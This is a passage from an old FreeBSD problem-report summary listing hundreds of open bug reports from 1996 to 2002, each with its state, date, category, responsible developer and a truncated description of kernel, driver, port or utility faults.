[2002/02/18] kern/35082 IBM Intellistation will not reboot with S o [2002/02/18] i386/35096 Network card dies copying files > 200MB w o [2002/02/20] misc/35150 FreeBSD 4.5 won't install ... out of inod o [2002/02/20] misc/35151 High NFSD load in FreeBSD 4.5R f [2002/02/26] kern/35354 4.4/4.5 FreeBSD causes hard lock after 20 o [2002/02/28] kern/35435 danny rl driver generates large amount of colli o [2002/03/01] kern/35466 xe driver can not read CIS tuples o [2002/03/06] i386/35615 sound ES1978 Maestro 2E sound card locks up mac o [2002/03/07] kern/35640 heavy collision rate hangs vr network int o [2002/03/09] docs/35723 doc le(4) page doesn't warn about likely syst o [2002/03/09] i386/35726 Won't let me use ifconfig on the interfac f [2002/03/14] i386/35902 Right after i configure the ip settings, o [2002/03/15] i386/35950 ACPI missing prevents install from floppi o [2002/03/19] kern/36095 cd9660_vfsops.c: cd9660_vget_internal() k o [2002/03/19] ports/36109 dirk [Patch / Update Port] www/mod_php4 (fixes o [2002/03/20] kern/36149 kernel panic with option PPP_DEFLATE for o [2002/03/23] kern/36228 hw.ata.tags=1 does not work o [2002/03/24] ports/36259 jmz XFree86-4 port broken. Missing version.de o [2002/03/25] kern/36313 ATA disk not bootable anymore after cvsup o [2002/03/26] i386/36342 rl/dc(smc) + ppppoe = major bug ! o [2002/03/27] kern/36384 Rushen local broken up f [2002/03/27] bin/36400 netstat crashes when trying to display AF o [2002/03/27] ports/36404 security-officerAcrobat Reader seems to link against zlib o [2002/03/28] ports/36427 kevlo Fix compile error( Port:net/vtun ). o [2002/03/29] kern/36504 dillon crash/panic vm_object_allocate under file o [2002/03/30] kern/36532 ar_buf because it is too short, it makes o [2002/03/30] kern/36539 installing a SIGCHLD handler makes libc_r o [2002/03/30] kern/36549 sym driver fails on Tekram DC-390U in 486 o [2002/04/03] i386/36710 possible privilege level check bug in /sy o [2002/04/04] kern/36748 ata breaks raid o [2002/04/07] i386/36850 Page Fault using ppp with USB Modem o [2002/04/08] ports/36871 glewis Ports JDK13 does not install properly on o [2002/04/10] ports/36964 portmgr cvsupit from www.freebsd.org is out of da o [2002/04/10] kern/36970 kernel cannot root device, ar0s1a on boot o [2002/04/12] kern/37015 Kernel panic in tty_subr.c while using pp o [2002/04/13] ports/37048 billf muh port have security problem o [2002/04/14] kern/37056 usb mouse with bios legacy support on han o [2002/04/14] kern/37060 kernel panic with hw.ata.tags=1 in ata-di o [2002/04/14] kern/37064 System hangs when removing wire of NIC D- o [2002/04/14] i386/37086 kernel trap 12 o [2002/04/14] ports/37087 ports java/jdk13 build fails after upgrading ge 221 problems total. Serious problems S Submitted Tracker Resp. Description ------------------------------------------------------------------------------- s [1996/12/30] kern/2325 quota.user enlarged, no boot on 2.2-BETA o [1997/02/07] kern/2690 asami When Using ccd in a mirror mode, file cre o [1997/02/19] kern/2768 ktrace(1) -i dumps corrupted trace data o [1997/02/20] bin/2785 wpaul callbootd uses an unitialized variable a [1997/04/01] bin/3170 sheldonh vi freaks and dump core if user doesn't e f [1997/05/04] i386/3502 mdodd Merge of if_ix* and if_ie* broke EE/16 su o [1997/05/06] bin/3524 imp rlogin doesn't read $HOSTALIASES for non- o [1997/06/28] misc/3980 peter access via NFS fails during mount-operati o [1997/07/02] kern/4012 peter 2.2-RELEASE/Digital UNIX NFSv3 0 length f f [1997/07/17] kern/4115 peter SunOS NFS file has wrong owner if creator o [1997/07/30] kern/4194 peter kernel pci driver for Digital 21041 Ether o [1997/08/12] kern/4284 paul le0 goes OACTIVE after some time o [1997/08/22] bin/4357 bug in adduser script causes duplicate UI s [1997/10/01] bin/4672 rdist does not do hard links right when t o [1997/10/16] kern/4782 dillon Under certain conditions, several krsh's o [1997/12/14] bin/5297 make incompatibility with System V style o [1998/01/27] kern/5587 des session id gets dropped o [1998/02/28] kern/5877 bmilekic sb_cc counts control data as well as data o [1998/03/19] kern/6066 paul lnc driver does not work correctly with A a [1998/04/07] kern/6238 cg Sound-driver patch for MAD16 (OPTi 928,92 a [1998/05/06] bin/6536 pppd doesn't restore drainwait for tty s [1998/06/02] bin/6830 make(1) exhibits confusing and non-standa s [1998/06/23] bin/7033 Same process notified multiple times o [1998/06/24] i386/7057 mdodd 3Com 3C509 locks up, or has >1000ms rtt u s [1998/07/05] kern/7169 cannot use accton on a append-only file o [1998/07/12] i386/7266 yokota PSM detection failure with Linksys consol s [1998/07/14] kern/7281 [STABLE] Multicast kludge does not work c s [1998/08/10] kern/7556 sl_compress_init() will fail if called an f [1998/09/11] kern/7902 if_de doesn't properly recognize a "Magic o [1998/09/17] bin/7968 If /usr/libexec/yppwupdate DNE, rpc.yppas o [1998/09/30] gnu/8099 obrien [patch] some bugs in cpio f [1998/10/08] kern/8206 [patch] Unconected UDP socket declined, i o [1998/11/10] bin/8646 peter Implement rlogind -a option f [1998/11/20] kern/8778 gibbs Buslogic BT948 in 2 boxes upgraded from S f [1998/11/25] bin/8865 dwmalone syslogd hangs with serial console o [1998/11/29] conf/8903 dillon /etc/rc can do NFS mounts before the netw o [1998/12/21] kern/9163 adrian [patch] squid does not join a multicast g s [1999/01/07] bin/9379 pppd does not go through all interfaces l s [1999/01/08] kern/9391 if_addmulti doesn't check for retifma == o [1999/01/13] kern/9478 assar support for running a script from kldload s [1999/02/06] kern/9927 gibbs the ahc driver doesn't correctly grok swi o [1999/02/15] kern/10107 dillon interlock situation with exec_map and a p f [1999/02/25] bin/10264 davidn passwd(1) tryis NIS even with `-l' switch o [1999/02/28] bin/10312 ken pciconf -l generates output incompatible s [1999/03/02] bin/10353 ypserv gets segmentation violation o [1999/03/09] bin/10510 Remote cvs botches commits on occassion o [1999/03/16] bin/10633 fenner [patch] tcpslice timezone problem and upd a [1999/03/24] kern/10778 ru "ipforward_rt" is not cleared when routin o [1999/03/30] kern/10870 eivind Kernel panic when writing to write-protec s [1999/04/08] misc/11024 getpwnam(3) uses incorrect #define to lim s [1999/04/28] conf/11376 NFS mount may be happening too soon in /e o [1999/05/03] kern/11462 imp CS network interface driver (for CS89XX b o [1999/05/04] kern/11490 yokota VESA+VM86+Splash == unstable system o [1999/05/05] kern/11507 imp CS89XX (i386/isa/if_cs.c) fails to proper o [1999/05/05] misc/11525 dwmalone [PATCH] Networking patches to increase # s [1999/05/07] gnu/11562 tar verification doesn't work o [1999/05/13] kern/11697 tegge Disk failure hangs system o [1999/05/18] i386/11773 yokota mouse works at setup time. Under X it go o [1999/05/28] kern/11922 deischen missing reentrant interfaces for getpwnam o [1999/07/07] kern/12551 mks ASIC output is shifted following a short o [1999/07/20] bin/12727 billf Game patches from NetBSD o [1999/08/14] kern/13141 se Multiple LUN support in NCR driver is bro o [1999/09/10] bin/13691 fenner tcpslice cannot extract over 2GB part of o [1999/09/13] kern/13740 jlemon wrong IP statistics s [1999/09/16] conf/13775 multi-user boot may hang in NIS environme s [1999/09/17] i386/13787 lnc driver isn't really the lnc driver o [1999/09/26] misc/13978 peter a write to last column bug appears since o [1999/09/27] kern/13997 rwatson RLIMIT_NPROC works unadequately for jails s [1999/10/04] i386/14135 lpt1 nolonger exists after 3.2-RELEASE o [1999/10/12] kern/14285 dillon NFS client appears to lose data o [1999/10/14] i386/14334 imp AHA-1542A not supported by FreeBSD 3.x (" o [1999/10/26] kern/14549 mdodd 3C509 broken in 3.3 o [1999/10/27] kern/14566 yokota Non-kernel programs have little/no contro a [1999/11/04] kern/14712 iedowse root has access to NFS mounted directorie s [1999/11/12] kern/14848 Frame Relay support, corrected a [1999/11/12] misc/14856 billf ftp stalls on FreeBSD 3.3 (CDROM) tested o [1999/11/17] i386/14946 mjacob rmt - remote magtape protocol s [1999/12/14] kern/15478 incorrect utmp/wtmp records update upon c o [1999/12/17] kern/15542 de suddenly stops working o [1999/12/23] misc/15662 markm [PATCH] perl5 Sys::Hostname fails if no P o [1999/12/26] kern/15707 dillon bad trap in mprotect o [2000/01/01] kern/15825 dillon Softupdates gets behind, runs the system s [2000/01/02] i386/15845 Driver for RealTek 8029 f [2000/01/03] bin/15877 tobez Perl 5.00503 interpreter crashes with a s o [2000/01/12] kern/16090 mdodd No buffer space available a [2000/01/22] kern/16299 tmm nfs.ko can be unloaded when nfsd is runni f [2000/01/24] ports/16343 reg bsd.port.mk cannot override make.conf. o [2000/02/08] kern/16587 cg Can't record with newpcm & CS4236 (AW35/P o [2000/02/10] kern/16644 Bad comparsion expression in bpf_filter.c o [2000/02/21] conf/16879 tanimura Sound drivers seem to be using shared irq o [2000/02/23] conf/16948 qa Sysinstall/disklabel: bad partition table o [2000/02/25] misc/16991 jhb booting install disk and USB s [2000/03/01] misc/17108 SecureRPC not supported in mount_nfs comm o [2000/03/10] misc/17310 wpaul NIS host name resolving may loop forever o [2000/03/16] kern/17422 bde 4.0-STABLE: top: nlist failed o [2000/03/20] kern/17504 ken Another Micropolis Synchronize Cache Prob f [2000/03/20] misc/17517 wpaul 100/10baseT card resets under load s [2000/03/21] conf/17540 NIS host lookups cause NFS mounts to wedg f [2000/03/21] kern/17542 greid random static with GUS PnP o [2000/03/24] misc/17584 groudier fatal SCSI error with a Symbios 53c875 co o [2000/03/27] i386/17626 green sshd cores when I scp to it o [2000/03/28] alpha/17637 billf misconfigured syscons bell causes panic o o [2000/03/29] i386/17662 gibbs cam_xpt.c incorrectly disables tagged que o [2000/03/31] i386/17713 gibbs MAKEDEV and /stand/sysinstall goofups wit o [2000/04/04] i386/17800 bde [PATCH] problem with statclock initializa f [2000/04/06] kern/17829 The dc driver is seriously broken o [2000/04/07] bin/17843 ftpd fails to set cwd with mode 700 NFS m f [2000/04/10] kern/17905 dillon 4.0-SNAP keep on crashing every 3 days o [2000/04/11] i386/17926 yokota psm device problems with apm resume o [2000/04/12] kern/17961 n_hibma Fatal Trap 12. Page fault while in kernel o [2000/04/12] kern/17965 wpaul vr (MII-bus version in 4.0 ONLY) driver l o [2000/04/14] kern/18012 adrian vnode_free_list corruption, "free vnode i o [2000/04/17] misc/18065 mdodd FREEBSD 4.0 crashes on boot Compaq Prolia o [2000/04/23] ports/18180 jmz xdm authorization fails with XDM-AUTHORIZ s [2000/04/23] bin/18181 Getty can fail to observe :de: specificat f [2000/04/23] i386/18185 gibbs Adaptec 3950U2 errors during boot/probe o [2000/04/24] kern/18200 mdodd 3com 3c509b recognized twice during boot f [2000/04/25] kern/18209 green rlimits are never checked in exec() if ex o [2000/04/28] kern/18285 the system froze when use scon -s 50 o [2000/05/02] kern/18345 cg sbc / pcm not fully recognizing AWE64 o [2000/05/02] kern/18348 yokota tags o [2000/07/19] kern/20040 msmith Toshiba 2775 hangs after pcib0 driver is o [2000/07/25] misc/20172 byacc 1.9 fails to generate $default tran o [2000/07/27] kern/20234 green panic(): lockmgr: pid 259, not exclusive o [2000/07/29] conf/20282 qa sysinstall does not recover some /etc fil f [2000/07/31] kern/20335 yokota S3Trio64V+ is detected as CGA by syscons a [2000/08/02] bin/20373 Setting breakpoints in shared objects bro o [2000/08/08] ports/20490 tg Termios timeout parameters, VMIN, VTIME, f [2000/08/09] i386/20507 yokota Mouse freezes in 4.0-release after some u o [2000/08/10] misc/20521 mjacob /etc/rmt several problems o [2000/08/10] kern/20523 bde Support for PCI multiport cards for sio d o [2000/08/13] kern/20572 marcel cannot safely remove COMPAT_43 from the k o [2000/08/14] kern/20609 dillon panic: vm_fault: fault on nofault entry, o [2000/08/15] bin/20633 fdisk doesn't handle LBA correctly f [2000/08/17] kern/20689 groudier Newbusified version of ncr driver does no o [2000/08/18] kern/20708 imp Adaptec 1542 ISA SCSI Controller not dete f [2000/08/22] bin/20779 assar junk pointer error causes kpasswd to fail o [2000/08/26] misc/20861 jasone libc_r does not honor socket timeouts o [2000/08/28] gnu/20912 mp gdb does not recognise old executables. f [2000/08/30] bin/20952 markm ftpd doesn't honor account expiration tim o [2000/08/31] kern/20958 mdodd ep0 lockup with ifconfig showing OACTIVE o [2000/09/07] misc/21089 vi silently corrupt open file on SIGINT w f [2000/09/08] kern/21139 ken IBM DNES drives need 'quirk table' entry. o [2000/09/11] bin/21208 tar does not support 2.5 GB file o [2000/09/11] kern/21209 groudier scsi ncr driver installs instead of scsi a [2000/09/13] bin/21248 kris openssl dumps core with blank passwords o [2000/09/13] bin/21251 NIS problem - ypbind does loop in CLNT_BR o [2000/09/14] gnu/21260 buffer overrun in uux o [2000/09/14] ports/21264 markm tn3270 port receives segmentation fault o [2000/09/14] gnu/21276 libI77 is unable to handle files >2Gbytes o [2000/09/15] bin/21292 ifconfig warn but does duplicate IP addre o [2000/09/15] kern/21304 wpaul dc0 watchdog timeouts on NetGear FA310TX o [2000/09/15] kern/21305 roger bktr driver dosn't send signals in contin s [2000/09/18] misc/21384 greid pcm driver has static in recorded audio o [2000/09/19] misc/21406 freebsd's bootinst or booteasy overwrites o [2000/09/20] gnu/21433 g++ optimiser produces bad code on right o [2000/09/21] kern/21461 imp ISA PnP resource allocator problem o [2000/09/21] kern/21463 emulationLinux compatability mode should not allow o [2000/09/26] i386/21559 BTX loader sometime show registers f [2000/09/27] bin/21603 green Can't change user passwords on 4.1.1-STAB o [2000/09/28] kern/21642 Compaq Netelligent 10/100 card (TI Thunde f [2000/10/02] misc/21701 qa Keymap selection menu broken on initial i o [2000/10/02] docs/21708 jlemon kqueue/kevent man pages isn't specific ab o [2000/10/02] ports/21714 sobomax audio problem with nil o [2000/10/05] kern/21771 murray Fix for sppp and Cronyx drivers update f [2000/10/06] kern/21791 Hang on FIN_WAIT_2 a [2000/10/06] kern/21808 [patches] msdosfs incorrectly handles vno o [2000/10/15] misc/21998 green ident only for outgoing connections o [2000/10/19] kern/22142 securelevel does not affect mount o [2000/10/22] bin/22212 skeyaccess(3) doesn't for primary group o [2000/10/24] misc/22284 Change (SunOS) NIS passwd error o [2000/10/25] bin/22291 getcwd() fails on recently-modified NFS-m o [2000/10/30] kern/22417 gibbs advansys wide scsi driver does not suppor o [2000/10/31] i386/22441 pmap_growkernel() is not effective at ker o [2000/11/05] bin/22614 billf pam_ssh dumps core o [2000/11/05] kern/22624 Interrupt conflict btw. vga and Ethernet o [2000/11/06] gnu/22635 Why don't you use truncate(2) in libI77 o [2000/11/13] kern/22826 emulationMemory limits have no effect in linux com o [2000/11/14] bin/22846 Routed does not reflect preference of Int f [2000/11/15] kern/22862 ncr probe fails with CACHE TEST FAILED: ? o [2000/11/15] kern/22866 Packets send on INET6 sockets compatible o [2000/11/18] kern/22943 emulationProblem with linux emulation o [2000/11/18] i386/22944 isa_dmainit fails on machines with 512MB a [2000/11/18] kern/22947 jon IBM 10/100 EtherJet Cardbus (Xircom X3201 f [2000/11/18] kern/22951 failed drive causes panic with HPT370 RAI f [2000/11/22] i386/23039 disklabel editor couldn't create partitio o [2000/11/23] gnu/23058 ncurses: tgoto_internal() ugliness o [2000/11/24] misc/23069 jkh Compat22 does not work until you reboot o [2000/11/25] bin/23098 ambrisko If installing on a serial console, enable o [2000/11/26] ports/23125 mbr Successful emulation of StarOffice depend f [2000/11/30] conf/23192 FTP REALLY slow on internal NIC aswel (12 a [2000/11/30] bin/23203 opie doesn't know that ssh connections ar o [2000/12/04] bin/23269 green OpenSSH TIS Authentication support has br o [2000/12/07] bin/23352 [SECURITY] buffer overflow in opieftpd f [2000/12/07] misc/23364 gethostbyaddr takes longer or locks up an a [2000/12/07] misc/23376 tobez The version of CGI.pm bundled with perl i o [2000/12/08] kern/23400 IPsec transport mode precludes filtering o [2000/12/11] kern/23468 imp xe Driver causes kernel panic when Xircom o [2000/12/11] bin/23489 tcsh fails to do file completion on non-E o [2000/12/12] kern/23515 get error in messages system log "Dec 11 o [2000/12/13] kern/23535 imp 4.x kernels seem to no longer support Ada o [2000/12/14] misc/23561 emulationLinux compatibility mode does not support o [2000/12/16] gnu/23593 obrien [patch] possible fix to awk(1) o [2000/12/18] ports/23638 kuriyama Add turbine-pool.jar to Cocoon CLASSPATH o [2000/12/22] kern/23771 bridge/firewall doesn't work as in bridge o [2000/12/26] bin/23866 dwmalone patch for pointing out current date o [2001/01/02] kern/24032 markm rndcontrol and pccardd use of interupt ha o [2001/01/03] kern/24059 n_hibma USB support broken in SMP kernel o [2001/01/04] kern/24070 n_hibma uhci USB driver disables port on reatachi o [2001/01/04] kern/24074 mdodd Properties of token-ring protocol must be f [2001/01/05] kern/24085 syncing on shutdown leaves filesystem dir o [2001/01/06] kern/24100 imp Having a 3c589 PCMCIA/PCCARD inserted pre o [2001/01/06] docs/24125 wes connect(2) can yield EWOULDBLOCK/EAGAIN f [2001/01/09] i386/24210 compaq dl360 hangs with smp kernel f [2001/01/10] conf/24238 First physical interface always has IPv6 o [2001/01/12] bin/24271 dumpon should check its argument more o [2001/01/16] misc/24391 cannot kill amd after interface disappear o [2001/01/19] bin/24461 pirzyk Being able to increase the YP timeout wit o [2001/01/19] bin/24472 libc_r does not honor SO_SNDTIMEO/SO_RCVT o [2001/01/22] kern/24559 aio_suspend() had Bus error when using -l s [2001/01/23] misc/24590 timezone function not compatible witn Sin o [2001/01/25] kern/24629 ng_socket failes to declare connected dat o [2001/01/25] bin/24632 libc_r delicate deviation from libc in ha o [2001/01/25] misc/24641 jasone pthread_rwlock_rdlock can deadlock o [2001/01/28] bin/24691 map-mbone segfaults at getsockname o [2001/01/29] ports/24711 portmgr ${MAKEFILE} causing trouble with ports o [2001/01/30] i386/24737 Socks5 clients die with leaving zombie pr o [2001/02/06] gnu/24903 Patch to remove 32bit limit from tar f [2001/02/06] i386/24916 SCSI timeout errors with adv0 driver (Adv o [2001/02/09] kern/24982 stack gap usage o [2001/02/10] i386/24997 /boot/loader cannot handle extended dos p o [2001/02/11] ports/25007 max telnetx problem on 4.x o [2001/02/12] kern/25037 top doesn't show CPU states (shows zeroes o [2001/02/12] kern/25038 murray dhcp client could not set hostname on boo o [2001/02/13] kern/25067 adrian able to mount a pathname > 80 char. but u o [2001/02/14] kern/25093 4.2-STABLE does not recognize PCNet-ISA+ a [2001/02/19] kern/25201 imp pccard event and syscons beep duration de o [2001/02/19] kern/25213 peter Bus abstraction interface doesn't allow p o [2001/02/21] kern/25248 bde sys/user.h needs sys/param.h, but doesn't f [2001/02/21] kern/25261 gibbs ahc0 no active SCB errors when booting of o [2001/02/21] ports/25272 rse Using eperl as cgi/nph binary executor ca s [2001/02/23] bin/25337 rwatson dmesg -a should be restricted o [2001/02/28] bin/25461 qa sysinstall's fdisk and disklabel don't wo f [2001/03/01] kern/25476 [PATCH] The syscall oldgetkerninfo can re o [2001/03/03] kern/25511 ioctl(fd, FIONREAD, &c) on a FIFO (not PI o [2001/03/04] ports/25522 portmgr FORBIDDEN ports doesn't return error for o [2001/03/05] bin/25542 /bin/sh: null char in quoted string o [2001/03/07] misc/25585 sed.test 8.16 puts bugged sed into infini o [2001/03/07] bin/25586 green Password expiration doesn't work after up o [2001/03/13] kern/25781 Statclocks cannot be disables on ServerWo o [2001/03/14] misc/25801 imp change IP-address on pccard (3Com) fails o [2001/03/15] bin/25826 nfsd -t -h adr1 -h adr2 doesn't work o [2001/03/16] misc/25851 qa Security hole in anonymous FTP setup scri o [2001/03/17] bin/25886 cgetset(3) doesn't get cleared when switc f [2001/03/18] i386/25889 FDISK lost a partition ! o [2001/03/19] bin/25929 Can't use MAKEDEV in fixit mount o [2001/03/20] kern/25949 msmith camcontrol doesn't find new drives or RAI o [2001/03/20] i386/25958 msmith Xfree86's savage and vesa drivers can pan o [2001/03/22] kern/25986 silby Socket would hang at LAST_ACK forever. o [2001/03/22] misc/26002 n_hibma Poor read/write performance on uhci USB c o [2001/03/22] kern/26013 Linksys (rev 3) USB 100TX NIC causes infi o [2001/03/23] ports/26036 dima acroread4 produces invalid postscript in o [2001/03/25] kern/26078 Jails cannot connect to the main server a o [2001/03/26] bin/26093 markm pam_unix rejects authenticating accounts o [2001/03/27] kern/26142 Unlink fails on NFS mounted filesystem f [2001/03/27] kern/26161 Kernel Panic on Dual Processor System dur o [2001/03/28] kern/26171 emulationnot work Linux-emulator, but hi is work i o [2001/03/31] i386/26261 silo overflow problem in sio driver o [2001/04/02] bin/26307 libc_r aborts when using the KDE media pl o [2001/04/03] kern/26309 PPPoE client panics in kernel - fxp probl o [2001/04/03] misc/26320 mountd breaks IRIX automounter f [2001/04/04] kern/26356 Large copy of files to the machine causes a [2001/04/05] gnu/26362 "cvs server" doesn't honour the global -- o [2001/04/06] kern/26384 dc driver hangs in dc_rxeof o [2001/04/08] kern/26430 cg -CURRENT panics on cat /dev/dsp or cat /d o [2001/04/09] ports/26464 mbr Citrix client no longer reads files in lo o [2001/04/10] misc/26486 setnetgrent hangs when netgroup contains o [2001/04/12] kern/26506 sendto() syscall returns EINVAL in jail e o [2001/04/14] kern/26567 Mouse driver will not properly restart if o [2001/04/14] kern/26568 Mouse driver will die if you move mouse a o [2001/04/16] kern/26613 ethernet vr0 hangs o [2001/04/19] kern/26704 AHA-2940[UW] gives MPARERR on cold boot ( o [2001/04/23] ports/26797 assar arla-0.34.6 causes kernel panic/page faul o [2001/04/23] bin/26809 /etc not saved on upgrade o [2001/04/25] bin/26842 dd dump with h flag takes a very long time o [2001/04/25] ports/26848 sobomax jre port core dumps a [2001/04/25] bin/26869 sheldonh vi(1) crashes in viewing a file with long o [2001/04/27] misc/26897 qa 4.3R sysinstall fails to create swap part o [2001/04/28] kern/26920 imp PCI autoconfiguration of USB, dc ether, a f [2001/04/29] kern/26953 adter the installation is over it's make o [2001/04/30] i386/26985 jkh floppy install 4.3 via FTP hangs o [2001/04/30] bin/26996 green sshd fails when / mounted read-only f [2001/05/01] kern/27020 FreeBSD 4.3RC compiled with an SMP kernel o [2001/05/02] ports/27052 portmgr libtool port broken in 4.3 RELEASE o [2001/05/04] bin/27086 green OpenSSH does not set X11 forwarding a [2001/05/08] ports/27202 dougb mail/pine sucks rocks when saving over NF o [2001/05/09] bin/27230 nectar Users after NIS lines in /etc/passwd o [2001/05/09] kern/27237 Watchdog Timeouts under EXCESSIVE load o [2001/05/09] kern/27242 SIGHUP propagation failure to processes o o [2001/05/10] i386/27247 Panic on install - "page fault syncing di a [2001/05/10] kern/27262 process won't be terminated after CPUTIME a [2001/05/15] ports/27358 znerd Naming scheme for JDK ports (java) o [2001/05/16] misc/27400 4.3 install hangs because it is looking f o [2001/05/17] ports/27419 jhb E-FancyLauncer clones itself over and ove o [2001/05/20] kern/27474 Interactive use of user PPP and ipfilter o [2001/05/21] misc/27498 grog vinum crashed after 'vinum dumpconfig' o [2001/05/21] kern/27522 des linprocfs:/proc/stat does not handle SMP o [2001/05/22] kern/27543 des /proc/cpuinfo does not handle SMP hosts o [2001/05/23] docs/27605 doc Cross-document references () o [2001/05/27] kern/27694 cg Panic in csa(4) f [2001/05/29] i386/27729 qa the ls120 device "afd" does not show up u o [2001/06/01] misc/27810 rpc.statd can loop o [2001/06/04] ports/27875 ports invoked on boot, SIGHUP is delivered and o [2001/06/04] ports/27883 bp shares mounted by the smbfs-1.4.1 port ar f [2001/06/05] misc/27893 sos can't burn audio cds on LG CD-RW CED-8083 o [2001/06/05] misc/27896 Error in /etc/exports invalidates entire o [2001/06/07] ports/27925 portmgr index is not updated when it html manpage o [2001/06/07] ports/27926 portmgr bsd.port.mk does not handle MLINKS with h o [2001/06/07] ports/27929 jmz make extract on x11/XFree86-4 port fails o [2001/06/09] bin/27988 [PATCH] let pam_ssh.so explicitly start s o [2001/06/09] kern/27995 src/sys/pci if_pcn.c revision 1.21 resp. o [2001/06/12] misc/28095 [PATCH] pax may descend into directories o [2001/06/12] kern/28100 Hang after device probe on EISA machine o [2001/06/12] ports/28102 assar Recent changes to 4.3-STABLE break arla-0 o [2001/06/14] ports/28155 portmgr DESTDIR is used incorrectly in bsd.port.m o [2001/06/15] kern/28173 Problem with Touchpad on Inspiron 5000e o [2001/06/15] misc/28188 Cron is being started to early in /etc/rc o [2001/06/16] kern/28218 A peer of TCP socket cannot detect termin o [2001/06/16] bin/28221 eric dialog(1) segfaults (due to the bug in li o [2001/06/17] bin/28223 su doesn't look at login.conf all the tim o [2001/06/17] bin/28224 ftpd doesn't honor invalid shelll in logi o [2001/06/17] i386/28231 /boot/loader can't load kernel on Xyberna o [2001/06/20] bin/28311 markm ftpd and sshd do not honor expired pw ent o [2001/06/23] ports/28378 jedgar p5-Net-IRC-0.70_1 eats irc text with col o [2001/06/23] bin/28381 Can't turn off telnet autologin o [2001/06/24] ports/28398 ports ja-dvips cannot find tex.pro o [2001/06/25] kern/28417 arplookup uses potentially unprotected st o [2001/06/26] bin/28424 mtree fails to report directory hierarchy o [2001/06/26] kern/28434 cs0's promiscuous mode does not work o [2001/06/27] misc/28442 hot rebuild on Compaq Intergrated Smart A o [2001/06/28] ports/28491 kiri www/w3-4 port: mismatch between pkg-plist f [2001/06/28] kern/28497 dmesg corrupted buffer/output o [2001/06/29] misc/28508 problems with backup to Tandberg SLR40 st o [2001/06/30] i386/28536 writing to corrupted msdosfs causes kerne f [2001/06/30] bin/28552 EUC support of wcstombs(3) is broken for o [2001/07/01] i386/28592 Please support boot from ATA RAID-0 devic o [2001/07/04] kern/28692 cg ICH sound driver hangs kernel o [2001/07/04] kern/28713 luigi NEW IPFW FEATURE [PATCHES]: Dynamic rule o [2001/07/05] misc/28737 D-Link DFE530TX - vr0: Watchdog Timeouts; o [2001/07/06] kern/28768 The system doesn't get connects on one of o [2001/07/06] bin/28773 [PATCH] Bug in pw, no $ in username o [2001/07/07] bin/28798 mikeh mail(1) with a pager (more) requires fg/C o [2001/07/07] i386/28802 3com Performance Pro modem conflicts with o [2001/07/09] kern/28840 gibbs Possible interrupt masking trouble in sys o [2001/07/09] bin/28852 cracauer behavior of /bin/sh with -e option looks o [2001/07/09] kern/28856 3COM PCI FaxModem with shared IRQ causes o [2001/07/11] ports/28889 lioux qpopper-4.0.3 error: Insufficient room to o [2001/07/12] i386/28928 wpaul dual starfire nic doesn't seem to work (a o [2001/07/13] bin/28935 dwmalone syslogd -u doesn't treat * as "all levels f [2001/07/15] i386/28985 Installing FreeBSD 4.3 on a Dell Optiplex o [2001/07/16] bin/29026 traceroute -s option allows any IP addres o [2001/07/17] bin/29049 green multi-user with star o [2001/09/15] misc/30590 /etc/hosts.equiv and ~/.rhosts interactio o [2001/09/15] kern/30592 roam [PATCH] panic: static sysctl oid too high o [2001/09/17] kern/30630 fenner Failure to check for existence of interfa o [2001/09/18] bin/30654 Added ability for newsyslog to archive lo o [2001/09/21] misc/30708 DHCP and multiple interfaces o [2001/09/21] kern/30712 fatal kernel trap during ufs_rename o [2001/09/21] ports/30728 portmgr pkg_add causes install of multiple versio o [2001/09/22] kern/30744 UDMA ICRC error results in kernel panic o [2001/09/23] kern/30755 It is impossible to mount CD-ROM in some o [2001/09/23] ports/30767 jmz silly links break XFree-4 port if /usr/X1 o [2001/09/24] kern/30798 contigfree() doesn't o [2001/09/25] kern/30820 sound PCM sound fails o [2001/09/25] ports/30823 ports New port: KinterbasDB, Python module to a o [2001/09/26] bin/30837 Sysinstall doesn't set the schg flag on t o [2001/09/27] gnu/30876 tar ignores complaints from gzip o [2001/09/30] ports/30947 ports mail/mahogany fails to build, conflicts w o [2001/09/30] kern/30948 ls'ing mounted brand new floppy locks up o [2001/09/30] kern/30952 kernel panics with 3C905[BC] cards / xl d o [2001/10/01] kern/30958 QUOTA with 0 bytes in quota.user hangs up o [2001/10/01] bin/30959 newfs -i x dumps core for small values of f [2001/10/01] bin/30966 fenner TCPdump repeating on Radius accounting pa o [2001/10/01] kern/30971 peter NFS client modification time resolution i o [2001/10/02] i386/30991 pcm in PNP-OS mode vs. non-PNP-OS mode po o [2001/10/02] bin/30993 xxgdb cannot open source file o [2001/10/04] bin/31029 cjc syslogd remote logging back down o [2001/10/04] i386/31035 Smart Array & SMP hangs on Proliant 1600 o [2001/10/04] bin/31045 routed dumps core o [2001/10/04] kern/31046 Linux OpenGL programs do not work under t o [2001/10/04] kern/31047 Linux programs do not dump core in linux o [2001/10/06] kern/31084 imp xe driver device probe fails in CIS tuple o [2001/10/06] kern/31085 kernel panic on tftp only pxeboot o [2001/10/07] kern/31102 lge + Pentium III data transmission probl o [2001/10/07] kern/31103 nfs read i/o error when nfs-mounting onto o [2001/10/07] ports/31113 portmgr bsd.ports.subdir.mk: remove NOCLEANDEPEND o [2001/10/08] kern/31147 Kernel panics (double fault) in some "net o [2001/10/09] ports/31184 ports Latex2html problem o [2001/10/10] ports/31191 ports netsaint - plugins sometimes not found o [2001/10/10] kern/31203 Cardbus xl driver broken on -CURRENT o [2001/10/11] ports/31216 znerd New port: devel/plist-builder o [2001/10/12] kern/31238 `hpijs' process hangs unkillably in `devb o [2001/10/14] docs/31265 dwmalone crontab(1) doesn't decribe format of allo o [2001/10/14] conf/31280 /etc/rc.network NFS server startup broken o [2001/10/15] bin/31306 qa sysinstall fails to create non-root parti o [2001/10/17] bin/31339 make's .if processing buggy o [2001/10/18] ports/31352 ports Netsaint check_by_ssh: fcntl(0, F_SETFL, o [2001/10/18] misc/31363 sysinstall "partition editor" silently co o [2001/10/21] kern/31398 cg newpcm does not play back the tail of sou f [2001/10/21] ports/31422 ache Does pkg_delete have to erase /usr/local/ f [2001/10/24] kern/31471 Specific IPFW's FWD rule crashes the kern o [2001/10/24] i386/31481 FreeBSD does Not find disk drives with Co o [2001/10/25] kern/31492 Panic in sysctl_remove_oid. o [2001/10/25] ports/31494 ache mod_perl fixes for apache13 port o [2001/10/26] ports/31511 obrien g++30 produces binaries which SIGBUS when o [2001/10/26] kern/31515 Use of USB Keyboard crashes 4.4 during in a [2001/10/27] kern/31530 Fatal trap 12 when reading from DVD. o [2001/10/29] kern/31597 pcm_addchan incorrectly adds vchans to PC o [2001/10/29] ports/31605 kde kmail cannot decrpyt/encrypt/verify gnupg o [2001/10/30] conf/31631 